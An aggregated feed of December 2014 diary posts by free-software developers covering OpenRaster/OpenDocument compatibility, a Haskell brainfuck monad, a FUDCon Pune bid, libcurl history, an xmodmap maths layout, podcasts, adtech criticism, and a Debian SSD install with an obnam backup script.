(this post was inspired by gregoa's debian advent calendar. i won't be posting public words of thanks as frequently or as diligently as he does, any more than i'll be fixing the number of RC bugs that he fixes. These are just two of the ways that gregoa consistently leads the community by example. He's an inspiration, even if living up to his example is a daunting challenge.)

Syndicated 2014-12-12 23:00:00 from Weblogs for dkg

12 Dec 2014 AlanHorkan   » (Master)

OpenRaster and OpenDocument

OpenRaster is a file format for layered images. The OpenRaster specification is small and relatively easy to understand: essentially, each layer is represented by a PNG image, the other information is written in XML, and it is all contained in a Zip archive. OpenRaster is inspired by OpenDocument.
OpenDocument is a group of different file formats, including word processing, spreadsheets, and vector drawings. The specification is huge and continues to grow. It cleverly reuses many existing standards, avoiding repeating old mistakes, and building on existing knowledge.

OpenRaster can and should reuse more from OpenDocument.



It is easy to say, but putting it into practice is harder. OpenDocument is a huge standard, so where to begin? I am not even talking about OpenDocument Graphics (.odg) specifically, but more generally than that. It is best to show it with an example. So I created an example OpenRaster image with some fractal designs. You can unzip this file and see that, like a standard OpenRaster file, it contains:


fractal.ora  
 ├ mimetype
 ├ stack.xml
 ├ data/
 │  ├ layer0.png
 │  ├ layer1.png
 │  ├ layer2.png
 │  ├ layer3.png
 │  ├ layer4.png
 │  └ layer5.png
 ├ Thumbnails/
 │  └ thumbnail.png
 └ mergedimage.png

It also, unusually, contains two other files: manifest.xml and content.xml. Although OpenDocument is a huge standard, the minimum requirements for a valid OpenDocument file come down to just a few files. The manifest is a list of all the files contained in the archive, and content.xml is the main body of the file; it does some of the things that stack.xml does in OpenRaster (for the purposes of this example — it does many other things too). The result of these two extra files, a few kilobytes of extra XML, is that the image is both OpenRaster AND OpenDocument "compatible" too. Admittedly it is an extremely small subset of OpenDocument, but it allows a small intersection between the two formats. You can test it for yourself: rename the file from .ora to .odg and LibreOffice can open the image.
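The packaging step can be sketched in a few lines of Python (my own minimal reconstruction, not the code used for the example file: the ODF specification places the manifest in META-INF/, and a content.xml that LibreOffice actually accepts needs a full office:document-content body, which is omitted here):

```python
import zipfile

# A minimal OpenDocument manifest listing the archive's root and content.xml.
MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest
    xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0">
 <manifest:file-entry manifest:full-path="/"
     manifest:media-type="application/vnd.oasis.opendocument.graphics"/>
 <manifest:file-entry manifest:full-path="content.xml"
     manifest:media-type="text/xml"/>
</manifest:manifest>
"""

def add_opendocument_compat(ora_path, content_xml):
    """Append the two extra OpenDocument files to an existing .ora archive.

    The original OpenRaster members (stack.xml, data/, etc.) are untouched;
    only a few kilobytes of XML are added.
    """
    with zipfile.ZipFile(ora_path, "a") as z:
        z.writestr("META-INF/manifest.xml", MANIFEST)
        z.writestr("content.xml", content_xml)
```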

To better demonstrate the point, I wanted to "show it with code!" I decided to modify Pinta (a Paint program written in GTK and C#) and my changes are on GitHub. The relevant file is Pinta/Pinta.Core/ImageFormats/OraFormat.cs which is the OpenRaster importer and exporter.

This is a proof of concept, it is limited and not useful to ordinary users. The point is only to show that OpenRaster could borrow more from OpenDocument. It is a small bit of compatibility that is not important by itself but being part of the larger group could be useful.

Syndicated 2014-12-12 04:03:51 from Alan Horkan

12 Dec 2014 joey   » (Master)

a brainfuck monad

Inspired by "An ASM Monad", I've built a Haskell monad that produces brainfuck programs. The code for this monad is available on hackage, so cabal install brainfuck-monad.

Here's a simple program written using this monad. See if you can guess what it might do:

import Control.Monad.BrainFuck

demo :: String
demo = brainfuckConstants $ \constants -> do
        add 31
        forever constants $ do
                add 1
                output

Here's the brainfuck code that demo generates: >+>++>+++>++++>+++++>++++++>+++++++>++++++++>++++++++++++++++++++++++++++++++<<<<<<<<[>>>>>>>>+.<<<<<<<<]

If you feed that into a brainfuck interpreter (I'm using hsbrainfuck for my testing), you'll find that it loops forever and prints out each character, starting with space (32), in ASCIIbetical order.

The implementation is quite similar to the ASM monad. The main differences are that it builds a String, and that the BrainFuck monad keeps track of the current position of the data pointer (as brainfuck lacks any sane way to manipulate its instruction pointer).

newtype BrainFuck a = BrainFuck (DataPointer -> ([Char], DataPointer, a))

type DataPointer = Integer

-- Gets the current address of the data pointer.
addr :: BrainFuck DataPointer
addr = BrainFuck $ \loc -> ([], loc, loc)

Having the data pointer address available allows writing some useful utility functions like this one, which uses the next (brainfuck opcode >) and prev (brainfuck opcode <) instructions.

-- Moves the data pointer to a specific address.
setAddr :: Integer -> BrainFuck ()
setAddr n = do
        a <- addr
        if a > n
                then prev >> setAddr n
                else if a < n
                        then next >> setAddr n
                        else return ()

Of course, brainfuck is a horrible language, designed to be nearly impossible to use. Here's the code to run a loop, but it's really hard to use this to build anything useful.

-- The loop is only entered if the byte at the data pointer is not zero.
-- On entry, the loop body is run, and then it loops when
-- the byte at the data pointer is not zero.
loopUnless0 :: BrainFuck () -> BrainFuck ()
loopUnless0 a = do
        open
        a
        close

To tame brainfuck a bit, I decided to treat data addresses 0-8 as constants, which will contain the numbers 0-8. Otherwise, it's very hard to ensure that the data pointer is pointing at a nonzero number when you want to start a loop. (After all, brainfuck doesn't let you set data to some fixed value like 0 or 1!)

I wrote a little brainfuckConstants that runs a BrainFuck program with these constants set up at the beginning. It just generates the brainfuck code for a series of ASCII art fishes: >+>++>+++>++++>+++++>++++++>+++++++>++++++++>

With the fishes^Wconstants in place, it's possible to write a more useful loop. Notice how the data pointer location is saved at the beginning, and restored inside the loop body. This ensures that the provided BrainFuck action doesn't stomp on our constants.

-- Run an action in a loop, until it sets its data pointer to 0.
loop :: BrainFuck () -> BrainFuck ()
loop a = do
    here <- addr
    setAddr 1
    loopUnless0 $ do
        setAddr here
        a

I haven't bothered to make sure that the constants are really constant, but that could be done. It would just need a Control.Monad.BrainFuck.Safe module, that uses a different monad, in which incr and decr and input don't do anything when the data pointer is pointing at a constant. Or, perhaps this could be statically checked at the type level, with type level naturals. It's Haskell, we can make it safer if we want to. ;)

So, not only does this BrainFuck monad allow writing brainfuck code using crazy haskell syntax, instead of crazy brainfuck syntax, but it allows doing some higher-level programming, building up a useful(!?) library of BrainFuck combinators and using them to generate brainfuck code you'd not want to try to write by hand.

Of course, the real point is that "monad" and "brainfuck" so obviously belonged together that it would have been a crime not to write this.

Syndicated 2014-12-12 05:02:52 from see shy jo

11 Dec 2014 marnanel   » (Journeyer)

Wordsworth

For an English Lit GCSE assignment I wrote the diary of a policeman who was following Wordsworth around the Lakes in the belief he was a Napoleonic spy. At one point our hero attempts to get the suspect to prove he's a poet by quoting the piece he's working on. It goes:

"Behold her, single in the field,
Reaping and singing by the hedge;
Reaping and singing by herself;
It really sets my teeth on edge.
Her notes are flat; it gives me pain
To hear her solitary strain."

"If she improves," he adds, "I may revise the stanza."

This entry was originally posted at http://marnanel.dreamwidth.org/318322.html. Please comment there using OpenID.

Syndicated 2014-12-11 22:04:37 (Updated 2014-12-11 22:04:50) from Monument

11 Dec 2014 Stevey   » (Master)

An anniversary and a retirement

On this day last year we got married.

This morning my wife cooked me breakfast in bed for the second time in her life, the first being this time last year. In thanks I will cook a three course meal this evening.

 

In unrelated news the BlogSpam service will be retiring the XML/RPC API come 1st January 2015.

This means that any/all plugins which have not been updated to use the JSON API will start to fail.

Fingers crossed nobody will hate me too much..

Syndicated 2014-12-11 10:56:05 from Steve Kemp's Blog

11 Dec 2014 amits   » (Journeyer)

Pune Bidding Again for FUDCon APAC!

When the call for bids for FUDCon APAC 2015 was put out, a few of us huddled together to discuss a bid from India.  We had already organised a successful FUDCon in Pune in 2011, so our initial conversations were around which city to host it in.  Pune won again, simply because more volunteers are available in Pune than anywhere else in India, and Pune has several technical colleges, which makes hosting the event at one of them easier.

This time around, we’re proposing to host the FUDCon at the MITCOE campus, more details in the bid page.

I was very pleased the last time around as an organiser of the FUDCon: everything had gone according to plan, even the 6 parallel sessions were running on schedule, and logistics were well taken care of.  The speakers and visitors were happy with how smoothly the event was run, despite its scale – hundreds of attendees, making it the largest FUDCon ever.

We had extensively documented the planning process – even face-to-face meetings were recorded on etherpads and posted as blog posts.  That exercise was to ensure people who wanted to join in and volunteer at any time didn't feel left out, and also to serve as useful documentation and a platform for people organising a future FUDCon at a similar scale.

That time has now come again, for us.  As part of our kickstart activities for FUDCon 2015, I went through several blog posts, event reports, and planning details from 2011.  I compiled a list of the most useful ones for the planning process, which I have appended to this blog post.

On voting for Pune again: One of the purposes of planning for a FUDCon is to involve the local non-Fedora community, like students, professors, and professionals.  Pune is fondly known as the Oxford of the East, which signifies it has a lot of education opportunities, and the city is brimming with students.  There are several colleges affiliated to the University of Pune, as well as some independently-run colleges and universities.  This gives us a lot of potential to tap into a huge student pool.

The other goal of planning a FUDCon is to involve the regional community, who know the city, its language, and so on, to pull off a successful FUDCon.  Pune fit the bill perfectly on these two counts.

When we started scouting for locations, we reached out to institutions we had had some contact with: several of us keep doing talks / sessions at events which are hosted at colleges.  One such talk was delivered by Siddhesh at the MIT college.  He was very impressed with the students there: they already have a FOSS chapter going, and the students were genuinely interested in technology and in solving problems themselves.  They also use Linux as part of their activities at the college, and a few also use Linux on their personal machines.  As with all things new, there was also a lot of interest in Android and writing apps, but as long as students are actively involved in technology, and doing fun things, we know we're going to have a very interested gathering for the FUDCon.

So based on this experience, we approached MIT to ask if they were willing to host the FUDCon.  We met with the MIT-COE folks: the HOD of the Comp. Dept., and a few professors.  They were very eager to host the event.  They offered us all kinds of assistance with hosting the event, offering their huge auditorium, and a few classrooms.  The facilities are nice, and we were impressed.  They do not have wireless on campus, but they said they will fix this by the time the event starts!  They will also arrange for power extension boards in the auditorium.  All this just in the first meeting, and before we even won the bid!

The professors too showed a keen interest in technology, and what we did as part of the Fedora project.  They asked us what kinds of talks they should expect (we showed them the schedule from the previous iteration), what would they gain from hosting the event — they were concerned we would step in, organise the event, and go away.  We ensured that won’t happen, and that their students will be involved in the organising of the event, and that we would also do a few things we did the last time, like organising FADs to prepare the students and faculty for the kinds of talks and discussions we’ll have at the FUDCon, setting up a local Fedora mirror, etc., and also some more – like introducing more upstream as well as direct Fedora technology.

In addition to the FUDCon, we also have planned to host one FAD (or a Fedora meetup, focussed on one topic) per month.  We’ve done a few of those at the Red Hat Pune office, but we plan to go to colleges for the next ones.  We also mentioned we could host such events at their colleges if they have interest.  They were eager to host such events too.

Overall, we felt MIT-COE and we would have a great time organising the FUDCon together.  It was really easy to decide on the venue based on these discussions.  The only point which needed some discussion was the timing of the event – Mar-Apr is exam time for the colleges, and that wouldn't have been ideal.  We went with June 2015 as a month when we all would be able to participate better.  The students will be fresh after an (almost) month-long vacation.

Another encouraging thing with scouting for locations was that there were several colleges that showed interest in hosting the FUDCon, as well as the smaller events.  We can't host the FUDCon at those venues, but we can surely host the smaller events (and the upcoming release party) at these locations.  I'm sure we'll get quite a few people (students + faculty) involved with Fedora and FOSS technology if we go through with our plans.

This post is already too long; I will save the rest for later (and for others to chime in).  As promised earlier, these are the links (in reverse chronological order) with information that will help organising a large FUDCon:
http://opensource.com/life/11/12/fudcon-pune-making-conference

http://log.amitshah.net/2011/11/fudcon-pune-day-1/

http://mether.wordpress.com/2011/11/03/fudcon-pune-2011-one-day-left/

http://log.amitshah.net/2011/11/quotable-quotes-and-videos-from-fudcon-pune-2011/

http://log.amitshah.net/2011/11/gearing-up-for-fudcon-pune-2011-day-2/

http://pjps.wordpress.com/2011/11/12/fudcon-pune-2011-2/

http://log.amitshah.net/2011/10/fudcon-pune-money-notes/

http://www.shakthimaan.com/posts/2011/11/12/fudcon-pune-badges/news.html

http://log.amitshah.net/2011/10/fudcon-pune-2011-f2f-meeting-minutes-13-oct/

http://log.amitshah.net/2011/10/fudcon-pune-planning-f2f-minutes-4-oct-2011/

http://log.amitshah.net/2011/09/fudcon-pune-f2f-planning-minutes-sep-27-edition/

http://mether.wordpress.com/2011/09/23/fudcon-india-sep-20-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/09/13/fudcon-india-sep-13-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/09/09/fudcon-india-sep-06-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/24/fudcon-india-aug-23rd-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/12/fudcon-india-aug-9th-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/05/fudcon-india-aug-2nd-2011-face-to-face-meeting-minutes/

http://log.amitshah.net/2011/07/fudcon-india-f2f-planning-meeting-minutes-jul-26-2011/

https://lists.fedoraproject.org/pipermail/fudcon-planning/2011-July/002521.html

http://mether.wordpress.com/2011/07/23/fudcon-pune-2011-now-open-for-sponsorship-requests/

http://log.amitshah.net/2011/07/fudcon-india-2011-f2f-meeting-2/

http://log.amitshah.net/2011/07/fudcon-india-planning-weekly-meetings/

http://log.amitshah.net/2011/07/first-fudcon-india-meeting/

http://log.amitshah.net/2011/07/fudcon-apac-2011-pune-nov-4-6/

Syndicated 2014-12-11 06:42:30 from Think. Debate. Innovate.

11 Dec 2014 marnanel   » (Journeyer)

Time blew away like dandelion seed

A few years ago, I collected 110 of my poems into a book; I'm bringing it back into print for a few months in order to pay bills since my partner and I are both too sick to work. You can buy it from Lulu in the UK, US, and many other countries-- usually it's US$20, about £12, but at present it's discounted to US$17, about £11.

There will also be a numbered and signed proper hardback edition of fifty; I'll be doing that through Kickstarter and announcing it later this week.

Let me know if you have questions. And tell your friends!



Reader comments:
“It's happy, sad, funny, thought-provoking and occasionally groan-worthy.”
“Overflowing with beauty, sadness and joy.”


This entry was originally posted at http://marnanel.dreamwidth.org/318047.html. Please comment there using OpenID.

Syndicated 2014-12-11 02:42:27 (Updated 2014-12-11 02:52:51) from Monument

10 Dec 2014 sye   » (Journeyer)

my last entry was Nov. 30th. There were 25 other people's entries between then and now. Need to mail a package to my brother in Shanghai. And also work on streaming data from WeChat to other data sources. site monitoring service:

http://www.isup.me/

I'd like to know how to turn off my BIGmon.net account alerts.

New Jersey Lawyer Magazine Dec. 2014/No. 291
"LABOR AND EMPLOYMENT LAW"

Message from the Special Editors
Brian R. Lehrer is with the law firm of Achenck, Price, Smith & King, LLP and is a member of the New Jersey Lawyer Magazine Editorial Board
Francine Esposito is a partner with the law firm of Day Pitney LLP.

When one individual inflicts bodily injury upon another, such that death results, we call the deed manslaughter; when the assailant knew in advance that the injury would be fatal, we call his deed murder. But when society places hundreds of proletarians in such a position that they inevitably meet a too early and an unnatural death, one which is quite as much a death by violence as that by the sword or bullet ... its deed is murder just as surely as the deed of the single individual...

When Friedrich Engels wrote these words in The Condition of the Working Class in England, he was discussing more than the conditions of the workplace. Engels was sickened by the abject poverty of a working class experiencing true income inequality with no recourse against their employers. Of course, Engels would go on to co-author the Communist Manifesto with his hero Karl Marx, and ignite a catastrophic experiment in social engineering. Meanwhile, in the United States, capitalism thrived, after surviving the Great Depression. Within that framework, laws were passed to protect employees, and courts interpreted those laws to balance the interests of employers and employees in the workplace.

The 23 articles in this issue of New Jersey Lawyer Magazine demonstrate the continuing importance the Legislature and courts have placed on that balance, and our society's belief that the workplace should be tolerable and productive -- from the wages paid to the conduct of supervisors. Whatever side of the fence you are on, the authors demonstrate the complexities of the employer-employee relationship and offer everything from practical tips in drafting severance agreements and restrictive covenants, to a discussion of cutting-edge issues such as medical marijuana in the workplace and the potential dilemmas involving unpaid interns.

....

10 Dec 2014 bagder   » (Master)

libcurl multi_socket 3333 days later

On October 25, 2005 I sent out the announcement about “libcurl funding from the Swedish IIS Foundation“. It was the beginning of what would eventually become the curl_multi_socket_action() function and its related API features. The API we provide for event-driven applications. This API is the most suitable one in libcurl if you intend to scale up your client up to and beyond hundreds or thousands of simultaneous transfers.

Thanks to this funding from IIS, I could spend a couple of months working full-time on implementing the ideas I had. They paid me the equivalent of 19,000 USD back then. IIS is the non-profit foundation that runs the .se TLD and they fund projects that help internet and internet usage, in particular in Sweden. IIS usually just call themselves “.se” (dot ess ee) these days.

Event-based programming isn’t generally the easiest approach so most people don’t easily take this route without careful consideration, and also if you want your event-based application to be portable among multiple platforms you also need to use an event-based library that abstracts the underlying function calls. These are all reasons why this remains a niche API in libcurl, used only by a small portion of users. Still, there are users and they seem to be able to use this API fine. A success in my eyes.

Part of that improvement project to make libcurl scale and perform better was also to introduce HTTP pipelining support. I didn’t quite manage that part within the scope of that project, but the pipelining support in libcurl was born in that period (autumn 2006) and had to be improved several times over the years until it became decently good just a few years ago – and we’re just now (still) fixing more pipelining problems.

On December 10, 2014 there are exactly 3333 days since that initial announcement of mine. I’d like to highlight this occasion by thanking IIS again. Thanks IIS!

Current funding

These days I’m spending a part of my daytime job working on curl with my employer’s blessing and that’s the funding I have – most of my personal time spent is still spare time. I certainly wouldn’t mind seeing others help out, but the best funding is provided as pure man power that can help out and not by trying to buy my time to add your features. Also, I will decline all (friendly) offers to host the web site on your servers since we already have a fairly stable and reliable infrastructure sponsored.

I’m not aware of anyone else who is spending (much) paid work time on curl code, although I know there are quite a few who do it every now and then – especially to fix problems that occur in commercial products or services or to add features to such.

IIS still donates money to internet related projects in Sweden but I never applied for any funding from them again. Mostly because it has been hard to sync with my normal life and job situation. If you’re a Swede or just live in Sweden, do consider checking this out for your next internet adventure!

Syndicated 2014-12-10 07:15:25 from daniel.haxx.se

10 Dec 2014 guylhem   » (Journeyer)

Unicode Greek and Maths letters with Linux

Here’s my new QWERTY keyboard:

 ¬∞ / ¹≈ / ²≠ / ³∇ / ⁴∀ / ⁵∪ / ⁶∩ / ⁷∈ / ⁸⊂ / ⁹≽ / ⁰≿ / ⁻ ⃗ / ⁺±
 θΘ / ωΩ / ɛƐ / ρϱ / ꚍꚌ / ψΨ / υϒ / ι∫ / ϖϵ / πΠ /  ̂  ̈ /  ̃ ̧  /  ̊  ̀
 α∂ / σΣ / δΔ / φΦ / ɣΓ / ηϘ / ϕϑ / 𝟀κ / λΛ /   ̅ ́ /   ̆ ̇
 ζϟ / ξΞ / ςϚ / √⊥ / βϐ / νͲ / μϡ / ≤≺ / ≥≻ / / ⃝

It’s an xmodmap I wrote to write math easily, using the 3rd and 4th levels (AltGr and Shift+AltGr), while keeping the standard layout by default.
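A few lines are enough to show how such a layout is declared (these exact lines are my reconstruction, not the author’s file): each keysym line lists four values – plain, Shift, AltGr, and Shift+AltGr.

```
! Levels: key, Shift+key, AltGr+key, Shift+AltGr+key.
! "a" stays a/A and gains alpha / partial-derivative on levels 3 and 4;
! "q" gains theta / Theta, matching the layout shown above.
keysym a = a A Greek_alpha partialderivative
keysym q = q Q Greek_theta Greek_THETA
keysym s = s S Greek_sigma Greek_SIGMA
```

Saved to a file, this would be loaded with `xmodmap mykeys.xmodmap`.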

For most letters, you’ll find Greek letters – including the rare ones, like script theta ϑ, script phi ϕ, script epsilon ϵ, and even the really rare ancient-Greek ones (check Wikipedia, they all have a cool story):

  • sampi Ͳ : U+0372 U+0373
  • numeric sampi ϡ : U+03E0 U+03E1
  • koppa Ϙ : U+03DE U+03DF
  • numeric koppa ϟ : U+03D8 U+03D9
  • digamma ς : U+03DA U+03DB  (but also U+03C2)

Numeric koppa ϟ looks like thunderbolts: ϟϟ. With koppa I can even add clouds above to make a full storm:-)

ϘϘϘϘϘϘ

ϟϟ ! ! ϟϟ ! !

Not sure I’ll ever use them, but who knows - and they’re fun!!

Digamma ς, the last one, is still used and goes by many names – waw, epsimmon, stigma, or “final sigma”, as that’s what σ should look like when it’s at the end of a word (so says Wikipedia!)

You’ll notice my lowercase gamma, tau and chi are not standard, because I hate the way they look in most fonts: a gamma that looks like a y or a chi that looks like an x won’t cut it. So I dug into Unicode shapes and found some cool replacements. Likewise for epsilon, which is accompanied by a big epsilon for whenever I need it, and the standard awfully round ϵ next to omegapi ϖ (that’s not a creative name; whoever created that one must have been really tired :-)

Beside all this unicode goodness, I have :

 - On the first row, math symbols (with the integral as Shift+AltGr I, the other exceptions being square root and perpendicular for the letter V, and rounded d ∂ for Shift+AltGr a, to keep company with α)

 - On the right-hand side, accents – so I can add a macron to any letter, or make vectors like α⃗ (alpha vector says hello!), or strike through things a⃗⃠ (alpha vector says goodbye!)

I love unicode and xmodmap :-)

Syndicated 2014-12-10 01:28:47 from Guylhem's most recent funny hacks & thoughts

9 Dec 2014 joey   » (Master)

podcasts that don't suck, 2014 edition

  • The Memory Palace: This is the way history should be taught, but rarely is. Nate DiMeo takes past events and puts you in the middle of them, in a way that makes you empathise so much with people from the past. Each episode is a little short story, and they're often only a few minutes long. A great example is this description of when Niagara Falls stopped. I have listened to the entire back archive, and want more. Only downside is it's a looong time between new episodes.

  • The Haskell Cast: Panel discussion with a guest; there is a lot of expertise among them and I'm often scrambling to keep up with the barrage of ideas. If this seems too tame, check out The Type Theory Podcast instead..

  • Benjamen Walker's Theory of Everything: Only caught 2 episodes so far, but they've both been great. Short, punchy, quirky, geeky. Astoundingly good production values.

  • Lightspeed magazine and Escape Pod blur together for me. Both feature 20-50 minute science fiction short stories, and occasionally other genre fiction. They seem to get all the award-winning short stories. I sometimes fall asleep to these, which can make for strange dreams. Two strongly contrasting examples: "Observations About Eggs from the Man Sitting Next to Me on a Flight from Chicago, Illinois to Cedar Rapids, Iowa" and "Pay Phobetor"

  • Serial: You probably already know about this high profile TAL spinoff. If you didn't before: You're welcome. :) Nuff said.

  • Redecentralize: Interviews with creators of decentralized internet tools like Tahoe-LAFS, Ethereum, Media Goblin, TeleHash. I just wish it went into more depth on protocols and how they work.

  • Love and Radio: This American Life squared and on acid.

  • Debian & Stuff: My friend Asheesh and that guy I ate Thai food with once in Portland in a marvelously unfocused podcast that somehow connects everything up in the end. Only one episode so far; what are you guys waiting on? :P

  • Hacker Public Radio: Anyone can upload an episode, and multiple episodes are published each week, which makes this a grab bag to pick and choose from occasionally. While mostly about Linux and Free Software, the best episodes are those that veer far afield, such as the 40 minute river swim recording featured in Wildswimming in France.

Also, out of the podcasts I listed previously, I still listen to and enjoy Free As In Freedom, Off the Hook, and the Long Now Seminars.

PS: A nice podcatcher for the technically inclined is git-annex importfeed. Featuring a list of feeds in a text file, and distributed podcatching!
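The basic shape, if you want to try it (the feed URLs below are placeholders):

```shell
# one feed URL per line
cat > feeds.txt <<'EOF'
http://example.com/memorypalace/rss
http://example.com/haskellcast/rss
EOF

# inside a git-annex repository: download new enclosures from every feed
xargs git annex importfeed < feeds.txt

# or use --relaxed to record the URLs without downloading, so other
# clones of the repository can fetch the episodes themselves
xargs git annex importfeed --relaxed < feeds.txt
```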

Syndicated 2014-12-09 19:05:20 from see shy jo

9 Dec 2014 wingo   » (Master)

state of js implementations, 2014 edition

I gave a short talk about the state of JavaScript implementations this year at the Web Engines Hackfest.


29 minutes, vorbis or mp3; slides (PDF)

The talk goes over a bit of the history of JS implementations, with a focus on performance and architecture. It then moves on to talk about what happened in 2014 and some ideas about where 2015 might be going. Have a look if that's a thing you are into. Thanks to Adobe, Collabora, and Igalia for sponsoring the event.

Syndicated 2014-12-09 10:29:20 from wingolog

8 Dec 2014 dan   » (Master)

ANN Sledge (We're lost in music)

As a person with a large ripped CD collection at home
I want to find and listen to that music from work/on my phone
So that I don’t have to talk to the people around me

Sledge is a program that you can run on a computer with

  • some music you want to listen to
  • a JVM
  • some means of exposing a TCP server port to the internet
  • libav / ffmpeg

It indexes all the music in the directories you tell it to look in, and then it serves a web page with a search box and some buttons on it, which you can access on a device (computer/phone/tablet/etc) that

  • can access the internet
  • has a web browser that supports the HTML5 AUDIO element and likes Ogg files (most of them, these days)

It’s also the first useful[*] thing I’ve written using Clojure and ClojureScript and Om. Get it at https://github.com/telent/sledge – no jar file download yet, so you’ll need Leiningen to build it

[*] defined as: I’m using it.

Standing on the shoulders of github

The heavy lifting was mostly done by others. In addition to the above-mentioned, it uses

  • https://github.com/weavejester/clucy as a Lucene interface
  • https://github.com/ztellman/aleph for streaming the transcoded audio
  • https://github.com/DanPallas/green-tags to wrap JAudioTagger

Future plans

It’s reached MVP, as far as I’m concerned: aside from a couple of bugs it meets my use case. But I do have more planned for it as time permits:

  • UI makeover, make it easier to discover music I’d forgotten I have
  • Make the initial media scan much much faster (currently does about 2000 files a minute on my machine) and/or show the progress as it scans
  • some tools for reporting on duplicate files
  • something to deal with correcting/adding tags to media files that have bad or no metadata
  • transcode to formats other than Ogg Vorbis, maybe, if there are people who want to use it with browsers that don’t support Ogg

A long long time ago

Previously: “I started looking at all the UPNP/DLNA stuff once for a “copious spare time” project, but I couldn’t help thinking that for most common uses it was surely way over-engineered”. In the four years (and two days) since, my opinions haven’t changed but my tools have.

Syndicated 2014-12-08 07:16:18 from diary at Telent Netowrks

8 Dec 2014 dmarti   » (Master)

Thought Leader Insights

Thought Leader Rob Rasko writes: One of the greatest fears publishers face is an impending loss of revenue, based on the spread between what they earn selling their premium inventory and what they earn from programmatic. In some instances, the delta between publisher premium and programmatic can be as great as ten to one; in other words, some publishers’ programmatic ads are earning only ten percent of what their premium counterparts earn. Since programmatic is here to stay...

Too much corporate speak. Let's see if we can find someone who puts it more clearly. This is my neighborhood. You and your friends have to show me a little respect, ah?....You should let me wet my beak a little.

Adtech proponents don't say it like that, though. It's not adtech people wanting to take web publishing's ad revenue away on their own initiative. Programmatic is here to stay and it's all INEVITABLE because of TECHNOLOGY and stuff. How about that Internet, disrupting the economy again? What can you do?

This is, of course, bullshit. The mess that web ads are in, where adtech destroys more value than it captures, is a matter of economic gamesmanship, not technological inevitability. Like all long-running varieties of bullshit, the adtech variety depends on different qualities to get past different people. It beats regular marketing people's filters by having just enough math in it to scare them. It gets past the technology people by appealing to one of the oldest, most deeply held IT biases: if it was hard to write, and technically elegant, it must be good. (Ever notice how so many tech people automatically say better ads instead of more targeted ads even when targeting reduces a medium's value?) Finally, the people with the best chance of detecting adtech bullshit—journalists who cover business and the web—are kept looking the wrong way by their own pride in the editorial/advertising firewall, which is ordinarily a good thing.

So what's the answer? Let's look at the chart.

Print is moving down and to the left. It'll be too small for analysts to bother tracking within a few years. Mobile is moving to the right, and a little up. All the web has to do is let mobile take over the bottom right corner, which it's on its way to doing, and move up and a little left to get out of the way and take print's old niche.

That depends on fixing third-party tracking, though. Maybe, if we can somehow get all the Thought Leaders to focus on native apps while the web quietly fixes its trackability issues, it'll be fixed before anyone knows it. Especially if publishers can give the audience a little nudge.

Bonus links

Leslie Anne Jones: Trapped between Yelp and a hard place

Alana Semuels: Is There Hope for Local News?

Rance Crain: Is Consumer Tracking the New Advertising?

News: Cleaning Up the Ad Clutter

Baekdal Plus: The Four Laws of Privacy - (by @baekdal)

John McDermott: Google’s display advertising dominance raises concerns

Lucia Moses: Inside T Brand Studio, The New York Times’ native ad unit (via Mediagazer)

Judy Shapiro: It's Time to Balance the Tech-Human Element in Marketing

Ruben Bolling: Richard Scarry's Busy Town in the 21st Century (via kottke.org)

Dan Gillmor: When Journalists Must Not Be Objective (via Dan Gillmor)

Samuel Gibbs: Europe’s next privacy war is with websites silently tracking users (via Techrights)

Mark Wilson: TMI Is The Future Of Branding

george tannenbaum: Mike Nichols and Digital Natives.

Tom Philpott: Brazil's Dietary Guidelines Are So Much Better Than the USDA's

rhhackettfortune: How online pharmacy spammer organizations really work (via Krebs on Security)

Jim Edwards: Google's New Ad Strategy Could Delay A Bunch Of Tech IPOs (GOOG) (via VentureBeat)

Ben Goldacre: When data gets creepy: the secrets we don’t realise we’re giving away

Zach Wener-Fligner: Google admits that advertisers wasted their money on more than half of internet ads

Barry Levine: With Big Data, where’s the magic in marketing?

Phys.org - latest science and technology news stories: Unlike humans, monkeys aren't fooled by expensive brands

Syndicated 2014-12-07 05:24:34 from Don Marti

7 Dec 2014 Stevey   » (Master)

I eventually installed Debian on a new desktop.

Recently I built a new desktop system. The highlights of the hardware are a pair of 512GB SSDs, which were to be configured in software RAID for additional speed and reliability (I'm paranoid that they'd suddenly stop working one day). From power-on to the (GNOME) login prompt takes approximately 10 seconds.

I had to fight with the Debian installer to get the beast working though, as only the Jessie Beta 2 installer would recognize the SSDs, which are Crucial MX100 devices. Both the daily testing installer deployed by my local PXE setup and the wheezy installer failed to recognize the drives at all.

The biggest pain was installing grub on the devices. I think this was mostly due to UEFI things I didn't understand. I created spare partitions for it, and messed around with grub-efi, but ultimately disabled as much of the "fancy modern stuff" as I could in the BIOS, leaving me with AHCI for the SATA SSDs, and then things worked pretty well. After working through the installer about seven times I also simplified things by partitioning and installing on only a single drive, and only configured the RAID once I had a bootable and working system.

(If you've never done that it's pretty fun. Install on one drive. Ignore the other. Then configure the second drive as part of a RAID array, but mark the other half as missing/failed/dead. Once you've done that you can create filesystems on the various /dev/mdX devices, rsync the data across, and once you boot from the system with root=/dev/md2 you can add the first drive as the missing half. Do it patiently and carefully and it'll just work :)

There were some niggles though:

  • Jessie didn't give me the option of the gnome desktop I know/love. So I had to install gnome-session-fallback. I also had to mess around with ~/.config/autostart because the gnome-session-properties command (which should let you tweak the auto-starting applications) doesn't exist anymore.

  • Setting up custom keyboard-shortcuts doesn't seem to work.

  • I had to use gnome-tweak-tool to get icons, etc, on my desktop.

Because I assume the SSDs will just die at some point, and probably both on the same day, I installed and configured obnam to run backups. There is more testing and suchlike around it, but this is the core of my backup script:

#!/bin/sh

# backup "/" - minus some exceptions.
obnam backup -r /media/backups/storage --exclude=/proc --exclude=/sys --exclude=/dev --exclude=/media /

# keep files for various periods
obnam forget --keep="30d,8w,8m" --repository /media/backups/storage

Syndicated 2014-12-07 08:12:46 from Steve Kemp's Blog

5 Dec 2014 joey   » (Master)

clean OS reinstalls with propellor

You have a machine someplace, probably in The Cloud, and it has Linux installed, but not to your liking. You want to do a clean reinstall, maybe switching the distribution, or getting rid of the cruft. But this requires running an installer, and it's too difficult to run d-i on remote machines.

Wouldn't it be nice if you could point a program at that machine and have it do a reinstall, on the fly, while the machine was running?

